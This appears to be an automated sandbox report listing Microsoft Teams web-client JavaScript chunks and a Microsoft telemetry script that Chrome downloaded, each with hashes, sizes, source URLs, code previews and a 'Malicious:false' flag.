                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[846365],{347912:(e,t,n)=>{n.d(t,{F:()=>o});const o="skipProofing"},811848:(e,t,n)=>{n.d(t,{jT:()=>a,KA:()=>l,PX:()=>d,ZV:()=>c,Th:()=>m});var o=n(364819),i=n(424443),r=n(727509),s=n(146068);const a=(0,i.dn)("Autocomplete"),l=()=>(0,s.z)("AutocompleteKeyProcessor",((e,t,n)=>!!t.autocomplete.isInitialized&&(t.autocomplete.current?.extension?.config.shouldReset?.(e.textInSelectedRange()?.value,n)?(t.autocomplete.cancel(),!1):"keydown"===n.type&&t.autocomplete.onKeyDown(n)))),d=()=>(0,s.z)("AutocompleteInputProcessor",(async(e,t,n)=>{const i=t.extensions.values("Autocomplete");if((0,o.isEmpty)(i))return!1;const r=(0,o.max)(i.map((e=>e.config.prevWordLookup??1))),s=e.getPreviousWords(r||0);if((0,o.isEmpty)(s))return!1;const a=e.getPreviousSentence().value||"",l=e.getValue("text"),d=t.autocomplete.current?.extension;if(t.autocomplete.current?.extension?.config.shouldReset?.(e.textI
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (44425)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):44533
                                                                                                                                                                                                                                                                            Entropy (8bit):5.270142196256675
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:3jOT4igirpMPTfKC3hVf2prHPPjzJkGmdTgAWbh/kBmhwkBBkXboeb8hIqHGi8Kd:5CCfq1m6Qb+mi8Fvw+CO50SfcJ5Y8
                                                                                                                                                                                                                                                                            MD5:B7289244C39667518303834AF67B17F2
                                                                                                                                                                                                                                                                            SHA1:A08B19A0A3EB54A16976EC1A606504130ABBB467
                                                                                                                                                                                                                                                                            SHA-256:D85996B603536F1616663A2D7077C2EAD6EA2F7BCC5108AA4C29051A52B57A68
                                                                                                                                                                                                                                                                            SHA-512:7940135EF7D4DE0F1F38E7468413E1D4FA97C5B89AA1E91198BA8B4D1F3B91D366E3A2080ED008B2C587D57D7CA99CCECEF6C6375F3300373CD493499E63F5C9
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[381452],{95110:e=>{e.exports=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,o=new Array(t);n<t;n++)o[n]=e[n];return o},e.exports.__esModule=!0,e.exports.default=e.exports},952002:(e,t,n)=>{var o=n(95110);e.exports=function(e){if(Array.isArray(e))return o(e)},e.exports.__esModule=!0,e.exports.default=e.exports},119666:(e,t,n)=>{"use strict";function o(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}n.d(t,{A:()=>o})},63428:(e,t,n)=>{"use strict";function o(e,t){for(var n=0;n<t.length;n++){var o=t[n];o.enumerable=o.enumerable||!1,o.configurable=!0,"value"in o&&(o.writable=!0),Object.defineProperty(e,o.key,o)}}function i(e,t,n){return t&&o(e.prototype,t),n&&o(e,n),Object.defineProperty(e,"prototype",{writable:!1}),e}n.d(t,{A:()=>i})},426220:(e,t,n)=>{"use strict";function o(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65529), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):278112
                                                                                                                                                                                                                                                                            Entropy (8bit):5.258465747930893
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:VCVVfQAAHltrSatKyTmGYO1+7EfV1dIsAHx6Q:cClACKAmS1+7EfV127x6Q
                                                                                                                                                                                                                                                                            MD5:59BFD4B0C4931E92C9D952C8AF3B95C2
                                                                                                                                                                                                                                                                            SHA1:7310301170EF288D8CD8DB205A56B82485602236
                                                                                                                                                                                                                                                                            SHA-256:16C54E4CBD1EAAFA4B09F84D93659671507CEDADC2BF8B5776E2822EB2D7E332
                                                                                                                                                                                                                                                                            SHA-512:9EC6D3D36AD32BA1B86CA093C6991EEBED93DFB5D77728DDD9B186C03205C4F721719EB16D69B4334455718AA7C8FACCEE49CE87680E8704FD1A36C624E36609
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/846365-786958b2f22b4af3.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[846365],{347912:(e,t,n)=>{n.d(t,{F:()=>o});const o="skipProofing"},811848:(e,t,n)=>{n.d(t,{jT:()=>a,KA:()=>l,PX:()=>d,ZV:()=>c,Th:()=>m});var o=n(364819),i=n(424443),r=n(727509),s=n(146068);const a=(0,i.dn)("Autocomplete"),l=()=>(0,s.z)("AutocompleteKeyProcessor",((e,t,n)=>!!t.autocomplete.isInitialized&&(t.autocomplete.current?.extension?.config.shouldReset?.(e.textInSelectedRange()?.value,n)?(t.autocomplete.cancel(),!1):"keydown"===n.type&&t.autocomplete.onKeyDown(n)))),d=()=>(0,s.z)("AutocompleteInputProcessor",(async(e,t,n)=>{const i=t.extensions.values("Autocomplete");if((0,o.isEmpty)(i))return!1;const r=(0,o.max)(i.map((e=>e.config.prevWordLookup??1))),s=e.getPreviousWords(r||0);if((0,o.isEmpty)(s))return!1;const a=e.getPreviousSentence().value||"",l=e.getValue("text"),d=t.autocomplete.current?.extension;if(t.autocomplete.current?.extension?.config.shouldReset?.(e.textI
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:C source, ASCII text, with very long lines (30464)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):30572
                                                                                                                                                                                                                                                                            Entropy (8bit):5.502105804639807
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:4+zTwT2pVltyC/kQr2/r06j/og6F4vsV89wDqSdx/u6oaCpfQyGITOrne7WAPK8H:S2pVlt/reeeSdNu6oaCpfQy+2OXFGkK
                                                                                                                                                                                                                                                                            MD5:12415301B0252A3F49E73534150430D8
                                                                                                                                                                                                                                                                            SHA1:5817233231C86D19315C61230639ADEC0AB77371
                                                                                                                                                                                                                                                                            SHA-256:76FA1AA75A6B46AFB81C85F4A58FE064DB37BD1C7A1AA214D0FF3ADCE649ED64
                                                                                                                                                                                                                                                                            SHA-512:58696B7EB7CD92A1AEA23A3C7E2512CA6A1802DE5801FAB5D3285F4A09692419E26CDFAC3EF25EF474ED82E0654563E4D220C68BA3E10CF2AE9196993E865A75
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[172435],{471735:(e,t,a)=>{a.d(t,{nv:()=>o,JT:()=>s,iO:()=>r});var i=a(332752),n=a(848020);const o=e=>e.get(i.w.Auth).buildCloud,s=(e,t)=>{const a=t?.get(i.w.Auth).cloudDomainMap;if(!a)return;const o=a.find((t=>t.domain===e))?.cloud;return o?n.el[o]:void 0},r=(e,t,a)=>{const n=t?.get(i.w.Auth).cloudDomainMap;if(!n||!e)return"";const o=n.find((t=>t.cloud===e))?.domain;return o?a?`https://${o}/`:`https://${o}/v2/`:""}},916042:(e,t,a)=>{a.d(t,{dz:()=>r,cd:()=>c,BD:()=>l,bo:()=>d,iy:()=>p,cF:()=>C,$f:()=>m,sB:()=>f,t5:()=>u,iX:()=>h,lO:()=>g});var i=a(170962),n=a(374348),o=a(332752),s=a(471735);const r=i.d,c=i.t.isLegacyMeetingUrl,l=i.t.isMeetingUrl,d=i.t.isTFLMeetingURL,p=i.t.getMeetingLegacyURL,C=(e,t)=>{const{enableIsTfwCloud:a}=t.get(o.w.Calling);return a?i.t.isTFWCloud((0,s.JT)(e,t)):i.t.isTFWDomain(e)},m=(e,t)=>{if(t){const a=(0,s.JT)(new URL(t).host,e);return!!a&&a!==(0,s.n
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):190152
                                                                                                                                                                                                                                                                            Entropy (8bit):5.348678574819375
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:0+mTq9mTuZEOHEXp6WXWkYVlMBMwMlJNbdffVv6GhL+rUWxa:STekBWkYVdLlJNbr6m+rUGa
                                                                                                                                                                                                                                                                            MD5:4877EFC88055D60953886EC55B04DE34
                                                                                                                                                                                                                                                                            SHA1:2341B026A3E2A3B01AFA1A39D1706840D75E09B3
                                                                                                                                                                                                                                                                            SHA-256:8405362EB8F09DF13AE244DE155B51B1577274673D9728B6C81CD0278A63C8B0
                                                                                                                                                                                                                                                                            SHA-512:625844EDC37594D5C2F7622BD1B59278BF68ABB2FA22476C56826433C961C7B1924858A7588F8B6284D3C5AC8738ECB895EEC949DE18667A98C04A59CB03DAC0
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://aadcdn.msftauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                                                                                                                                                                                                                                            Preview:(window.telemetry_webpackJsonp=window.telemetry_webpackJsonp||[]).push([[2],[,,,function(e,t,n){"use strict";n.r(t),n.d(t,"ValueKind",(function(){return r.e})),n.d(t,"EventLatency",(function(){return r.a})),n.d(t,"EventPersistence",(function(){return r.b})),n.d(t,"TraceLevel",(function(){return r.d})),n.d(t,"AppInsightsCore",(function(){return i.a})),n.d(t,"BaseCore",(function(){return d})),n.d(t,"_ExtendedInternalMessageId",(function(){return r.f})),n.d(t,"EventPropertyType",(function(){return r.c})),n.d(t,"ESPromise",(function(){return g})),n.d(t,"ESPromiseScheduler",(function(){return C})),n.d(t,"ValueSanitizer",(function(){return I})),n.d(t,"NotificationManager",(function(){return E.a})),n.d(t,"BaseTelemetryPlugin",(function(){return S.a})),n.d(t,"ProcessTelemetryContext",(function(){return N.a})),n.d(t,"MinChannelPriorty",(function(){return w.a})),n.d(t,"EventsDiscardedReason",(function(){return P.a})),n.d(t,"DiagnosticLogger",(function(){return c.a})),n.d(t,"LoggingSeverity",(fun
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (30489)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):30597
                                                                                                                                                                                                                                                                            Entropy (8bit):5.36114233090183
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:J+fPoXF4ikn1Fd9nZTBJCda5tgMRillf5xeO55XqqRCRWtcNH4oYJF:KW6U8TwAQb
                                                                                                                                                                                                                                                                            MD5:B34B6A1930919E2D8AD388FEA65E6E64
                                                                                                                                                                                                                                                                            SHA1:F43E4975CFE5BEA3EB9298FEBC37BCB333582026
                                                                                                                                                                                                                                                                            SHA-256:97E8A6EA62E0062C54C0D755509DD5F9ACF2C4C41297170AC361EDF1FD882D43
                                                                                                                                                                                                                                                                            SHA-512:2B0C9CF798816C5ECDD5CF056130EAA4ED4D5AA4C92A341A43C35B788EEF9C0FFC3C876C28A9D96A97BA6FE1C96A7FAF403B95C69665CF6D578C28F2A02676AE
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/233940-74cf9f018d3d63e1.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[233940],{626388:(e,t,r)=>{var n;function o(e){return!!e&&e<7}r.d(t,{p:()=>n,b:()=>o}),function(e){e[e.loading=1]="loading",e[e.setVariables=2]="setVariables",e[e.fetchMore=3]="fetchMore",e[e.refetch=4]="refetch",e[e.poll=6]="poll",e[e.ready=7]="ready",e[e.error=8]="error"}(n||(n={}))},422816:(e,t,r)=>{r.d(t,{M:()=>i,K:()=>s});var n=r(383851),o=(r(360418),r(852965));function i(e){return e.hasOwnProperty("graphQLErrors")}var s=function(e){function t(r){var n,i,s=r.graphQLErrors,a=r.clientErrors,c=r.networkError,u=r.errorMessage,l=r.extraInfo,d=e.call(this,u)||this;return d.graphQLErrors=s||[],d.clientErrors=a||[],d.networkError=c||null,d.message=u||(n=d,i="",((0,o.E)(n.graphQLErrors)||(0,o.E)(n.clientErrors))&&(n.graphQLErrors||[]).concat(n.clientErrors||[]).forEach((function(e){var t=e?e.message:"Error message not found.";i+="".concat(t,"\n")})),n.networkError&&(i+="".concat(n
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):1132
                                                                                                                                                                                                                                                                            Entropy (8bit):5.286761914638033
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24:wp3sp389aKZ8FzXbSu6G1Thh7jAga08xOVbLoTP3YhYbB:wp3sp3xK2z319C3x6voLY2B
                                                                                                                                                                                                                                                                            MD5:E64641781757C9FD4E4F3087FD37EB26
                                                                                                                                                                                                                                                                            SHA1:AD3CD4AC308D71350795CD9499836B4163A2C039
                                                                                                                                                                                                                                                                            SHA-256:7FF1F60B66A1BAAB538F0030F7043B542295FA881BC28407B3D89E7D1138FB8D
                                                                                                                                                                                                                                                                            SHA-512:5D76A81D69B94F90349E0E564E1C4DA7BF69A81293BA0787CEB8CE9AFB1A8AB12B4354C04F9E9C95AE064AB4ED38D24D1D2BDA95727731F9E041AB5FE5F972C9
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/372599-680e6f16dbfe58e8.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[372599],{372599:(e,a,s)=>{s.d(a,{v:()=>h});var c=s(957032),l=s(395225),t=s.n(l),i=s(485529),n=s(829289);const h=(0,i.Ke)({svg:({classes:e})=>(0,c.Y)("svg",{role:"presentation",focusable:"false",viewBox:"8 8 16 16",className:e.svg,children:(0,c.Y)("g",{children:[(0,c.Y)("path",{className:t()(n.Q.outline,e.outlinePart),d:"M21 15.97c0 .14-.05.25-.15.35l-7 7a.485.485 0 0 1-.7 0 .485.485 0 0 1 0-.7l6.64-6.65-6.64-6.65a.485.485 0 0 1 0-.7.485.485 0 0 1 .7 0l7 7c.1.1.15.21.15.35z"}),(0,c.Y)("path",{className:t()(n.Q.filled,e.filledPart),d:"M21.5 15.97c0 .28-.1.52-.29.71l-7 7c-.19.19-.43.29-.71.29-.14 0-.26-.03-.38-.08s-.23-.13-.32-.22-.16-.2-.22-.32a1.036 1.036 0 0 1-.01-.77c.05-.12.12-.23.21-.32l6.3-6.29-6.3-6.29a.85.85 0 0 1-.21-.32c-.05-.13-.07-.26-.07-.39a.995.995 0 0 1 .3-.7c.09-.09.2-.16.32-.22.12-.05.24-.08.38-.08.28 0 .52.1.71.29l7 7c.19.19.29.43.29.71z"})]})}),displayName:"
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (8127)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):8235
                                                                                                                                                                                                                                                                            Entropy (8bit):4.478708887162824
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:6zdoCFq2V28V2DV2535hwYvfvMvavBh+emvI6+e+TJfD6D4SEj2H6w:edoChVPV0VghLvfvMvav/+emvI6+eE3g
                                                                                                                                                                                                                                                                            MD5:8EA58F112F601CFF7AA2D7675882B65E
                                                                                                                                                                                                                                                                            SHA1:115284DC07B6527AC92A9A6640651995613499BE
                                                                                                                                                                                                                                                                            SHA-256:A2481FF7560DC2909D030DC4D7303BCF0E30BB65AA09960B9D6E8D93A7A36A84
                                                                                                                                                                                                                                                                            SHA-512:A67DABF2B3FA32FD3B81A5A0DC32E1A7F286B69FBE6D5D07A614610721606FBBC154D2DFE060497E506A62B854BD46BCEFA625D1629AECCF3504F0B33670CABA
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[119068],{119068:(a,l,Z)=>{Z.d(l,{JuR:()=>v,uUQ:()=>h,p46:()=>L,IyQ:()=>m,HMO:()=>r,nfo:()=>H,Dd:()=>c,ICI:()=>M,Cr5:()=>V,zeV:()=>A,do:()=>t,gke:()=>u,AqU:()=>U,ue5:()=>S,S6q:()=>d,lq8:()=>g,z6r:()=>i,qVr:()=>R,xge:()=>s,X_q:()=>k});var e=Z(693935);const v=(0,e.U)("Sparkle20Regular","20",["M7.4 12.8a1.04 1.04 0 0 0 1.59-.51l.45-1.37a2.34 2.34 0 0 1 1.47-1.48l1.4-.45A1.04 1.04 0 0 0 12.25 7l-1.37-.45A2.34 2.34 0 0 1 9.4 5.08L8.95 3.7a1.03 1.03 0 0 0-.82-.68 1.04 1.04 0 0 0-1.15.7l-.46 1.4a2.34 2.34 0 0 1-1.44 1.45L3.7 7a1.04 1.04 0 0 0 .02 1.97l1.37.45a2.33 2.33 0 0 1 1.48 1.48l.46 1.4c.07.2.2.37.38.5Zm.08-7.4.53-1.38.44 1.37a3.33 3.33 0 0 0 2.12 2.12l1.4.53-1.38.45a3.34 3.34 0 0 0-2.11 2.11l-.53 1.38-.45-1.38a3.34 3.34 0 0 0-2.1-2.12L4 7.96 5.4 7.5a3.36 3.36 0 0 0 2.08-2.12Zm6.06 11.45a.8.8 0 0 0 1.22-.4l.25-.76a1.09 1.09 0 0 1 .68-.68l.77-.25a.8.8 0 0 0-.02-1.52l-.77-.25a1.0
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (20066)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):20174
                                                                                                                                                                                                                                                                            Entropy (8bit):5.5395203125935
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:/PMieoaOaFDYto8tTN7PU1sIeJmW2CuvPH/MOOgE2bUgQ3jVrX5Pjuuw8uz11p2G:3MRoafFDYa8RtPU13fWK7x433P+8uzj9
                                                                                                                                                                                                                                                                            MD5:938A06659434BF1604CFDA704911C75F
                                                                                                                                                                                                                                                                            SHA1:C557C8DBAF7B0A50196FDC4FCAEBB77EEA37DE7F
                                                                                                                                                                                                                                                                            SHA-256:25CC246230C3CE27CC827F12331DC598E0484F8D26006A359166F93046F1114C
                                                                                                                                                                                                                                                                            SHA-512:0CE97B9E5580A7DB226994E1A5135F8AFA3A71ABA4BC75DF767A4D1894FD77D4990A8A1D9CCD500EEED928DDB0CE695E951FC36B86F6FCACD03F5BA842F24C9C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/763473-75dc880f1f9fdebc.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[763473,715557],{414214:(e,a,t)=>{t.d(a,{M:()=>n});var n=function(e){return{attributes:{dismissAction:{"aria-describedby":e.bodyId}}}}},146950:(e,a,t)=>{t.d(a,{l:()=>H});var n=t(513432),o=t(644525),l=t(578902),i=t(854130);var r=t(48374),s=t(754814),c=t(517822),u=t(811751),f=t(169233),d=t(140996),p=t(786394),b=t(589256),m=t(411947),h=t(164093),g=t(478304),v=t(602835),y=t(264278),k=t(585536),w=t(953291),z=t(922584),B=t(35871),q=t(205745),x=t(910889),j=t(437932);const N=e=>e?e.toDateString():"",D=e=>{const a=Date.parse(e);return a?new Date(a):null},S=(e,a)=>{const{allowTextInput:t=!1,allFocusable:o=!1,borderless:l=!1,dateTimeFormatter:i,defaultOpen:S=!1,disableAutoFocus:C=!0,firstDayOfWeek:P=c.ob.Sunday,firstWeekOfYear:_=c.zX.FirstDay,formatDate:T=N,highlightCurrentMonth:F=!1,highlightSelectedMonth:O=!1,initialPickerDate:A,inlinePopup:L=!1,isMonthPickerVisible:H=!0,maxDate:E,minD
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (62375), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):73859
                                                                                                                                                                                                                                                                            Entropy (8bit):5.5092296140052985
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:lCth9qrU23xkE6VvHlGxtY+vo1XPuGxIJ:c2BkEKok+voESIJ
                                                                                                                                                                                                                                                                            MD5:F9CFAD83CEA140B7C8BFCD7234676ED4
                                                                                                                                                                                                                                                                            SHA1:061A52298D46B62598CAB7959FC11D58A548362E
                                                                                                                                                                                                                                                                            SHA-256:A6DBF4B85629437AD65DBFDD733C99ED566893FBC599C8CAAC0B015C73F471B8
                                                                                                                                                                                                                                                                            SHA-512:A1C72677FCDA27DAD02CB6A935411D863C38FF8A3E76B88685EE88FDE77E68902F79A4302749405EFF8E9D809395308DCB81E7E639206AFD83E87EEE25D7C3B1
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/710639-d32f6e097a5709e2.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[710639],{861782:(t,e,r)=>{var i=r(8605),s=r(548738),n={__proto__:null,style:!0,script:!0,xmp:!0,iframe:!0,noembed:!0,noframes:!0,plaintext:!0,noscript:!0};var a={__proto__:null,area:!0,base:!0,basefont:!0,br:!0,col:!0,command:!0,embed:!0,frame:!0,hr:!0,img:!0,input:!0,isindex:!0,keygen:!0,link:!0,meta:!0,param:!0,source:!0,track:!0,wbr:!0},o=t.exports=function(t,e){Array.isArray(t)||t.cheerio||(t=[t]),e=e||{};for(var r="",s=0;s<t.length;s++){var n=t[s];"root"===n.type?r+=o(n.children,e):i.isTag(n)?r+=c(n,e):n.type===i.Directive?r+=h(n):n.type===i.Comment?r+=p(n):n.type===i.CDATA?r+=u(n):r+=l(n,e)}return r};function c(t,e){"svg"===t.name&&(e={decodeEntities:e.decodeEntities,xmlMode:!0});var r="<"+t.name,i=function(t,e){if(t){var r,i="";for(var n in t)i&&(i+=" "),i+=n,(null!==(r=t[n])&&""!==r||e.xmlMode)&&(i+='="'+(e.decodeEntities?s.encodeXML(r):r)+'"');return i}}(t.attribs,e);return i&&(r
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2226)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):2334
                                                                                                                                                                                                                                                                            Entropy (8bit):4.825945121544423
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:wp3sp3LiouLAZn3gaUA+YAu+cagHolf3FWNBpjFgasYAu+cagHonRe9:kTkQA+YBagIV04YBagIY
                                                                                                                                                                                                                                                                            MD5:BA38CEE8C377859BE1F9CE537CDFBA60
                                                                                                                                                                                                                                                                            SHA1:6DECCD6607F0B7FEC7BBC5B7152ECE6EB098F927
                                                                                                                                                                                                                                                                            SHA-256:F9E2FC19A87459D0C955BBAA4F301B54BD93D8E868B5119097C2A24E336EE203
                                                                                                                                                                                                                                                                            SHA-512:29D5CE2205845148C5AB04E483B61576CD695E700BEBBE35AE46C26C435C824303DBAE9C6594ABFD99F884E10F292F0D931E09CCED846DD98DE8BD28408B875A
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/295416-2f0a50be22e0bd2f.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[295416],{295416:(C,e,s)=>{s.d(e,{w:()=>i});var L=s(957032),a=s(395225),t=s.n(a),l=s(485529),c=s(829289);const i=(0,l.Ke)({svg:({classes:C})=>(0,L.Y)("svg",{role:"presentation",focusable:"false",viewBox:"0 0 16 16",className:t()(C.svg),children:[(0,L.Y)("path",{className:t()(c.Q.outline,C.outlinePart),d:"M8.5 10C9.32843 10 10 10.6716 10 11.5V12C10 13.9714 8.14049 16 5 16C1.85951 16 0 13.9714 0 12V11.5C0 10.6716 0.671573 10 1.5 10H8.5ZM8.5 11H1.5C1.22386 11 1 11.2239 1 11.5V12C1 13.4376 2.43216 15 5 15C7.56784 15 9 13.4376 9 12V11.5C9 11.2239 8.77614 11 8.5 11ZM5 3.5C6.51878 3.5 7.75 4.73122 7.75 6.25C7.75 7.76878 6.51878 9 5 9C3.48122 9 2.25 7.76878 2.25 6.25C2.25 4.73122 3.48122 3.5 5 3.5ZM14 0C15.0544 0 15.9182 0.815878 15.9945 1.85074L16 2V4C16 5.05436 15.1841 5.91817 14.1493 5.99451L14 6H12.499L11.301 7.59979C10.7716 8.30599 9.69652 8.01993 9.52431 7.22426L9.50656 7.11264L
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (6442)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):6549
                                                                                                                                                                                                                                                                            Entropy (8bit):4.423584442346006
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:jF1VzTfHkA59oiGjJRVvOiPtwiPKnGYeAy7bgIriKVFJymxjr92u4uTg7VS2uak5:Z1BHJGVRVQWbgeVnk76TTFCbkV
                                                                                                                                                                                                                                                                            MD5:56C5065DEA54846EEE66810FDD4B1760
                                                                                                                                                                                                                                                                            SHA1:A711A000A77A3FFB841AD985A6B8308D6E1A8BA9
                                                                                                                                                                                                                                                                            SHA-256:69AB6B37B3B69767632FAF30A02E6DF49BFD8A42013A3293F5CFB019FFE02F3B
                                                                                                                                                                                                                                                                            SHA-512:9DDA25938BFBCAEA7DBAC2213147235957195CF94C69BB69B3C79FBA1EE79DE2F50731C2CC4B39A7812B49D8ECC3A8E5D345C765292F63D8064E868EACC47C09
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/40790-c113489658672afc.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[40790],{40790:(a,h,v)=>{v.d(h,{cOw:()=>l,S95:()=>e,IY4:()=>m,MiG:()=>c,CGe:()=>M,e_3:()=>H,svh:()=>V,lTA:()=>A,Vbj:()=>t,zn0:()=>C,nwp:()=>i,GH9:()=>o,kMD:()=>n,TTy:()=>r});var Z=v(693935);const l=(0,Z.U)("Clover20Filled","20",["M5.5 2a3.5 3.5 0 1 0 0 7h3a.5.5 0 0 0 .5-.5v-3A3.5 3.5 0 0 0 5.5 2Zm0 15a3.5 3.5 0 1 1 0-7h3c.28 0 .5.22.5.5v3A3.5 3.5 0 0 1 5.5 17Zm8-15a3.5 3.5 0 1 1 0 7h-3a.5.5 0 0 1-.5-.5v-3A3.5 3.5 0 0 1 13.5 2Zm0 15a3.5 3.5 0 1 0 0-7h-3a.5.5 0 0 0-.5.5v3a3.5 3.5 0 0 0 3.5 3.5Z"]),e=(0,Z.U)("Clover20Regular","20",["M5.5 2a3.5 3.5 0 1 0 0 7h3a.5.5 0 0 0 .5-.5v-3A3.5 3.5 0 0 0 5.5 2ZM3 5.5a2.5 2.5 0 0 1 5 0V8H5.5A2.5 2.5 0 0 1 3 5.5ZM5.5 17a3.5 3.5 0 1 1 0-7h3c.28 0 .5.22.5.5v3A3.5 3.5 0 0 1 5.5 17ZM3 13.5a2.5 2.5 0 0 0 5 0V11H5.5A2.5 2.5 0 0 0 3 13.5Zm14-8a3.5 3.5 0 1 0-7 0v3c0 .28.22.5.5.5h3A3.5 3.5 0 0 0 17 5.5ZM13.5 3a2.5 2.5 0 0 1 0 5H11V5.5A2.5 2.5 0 0 1 13.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (45797)
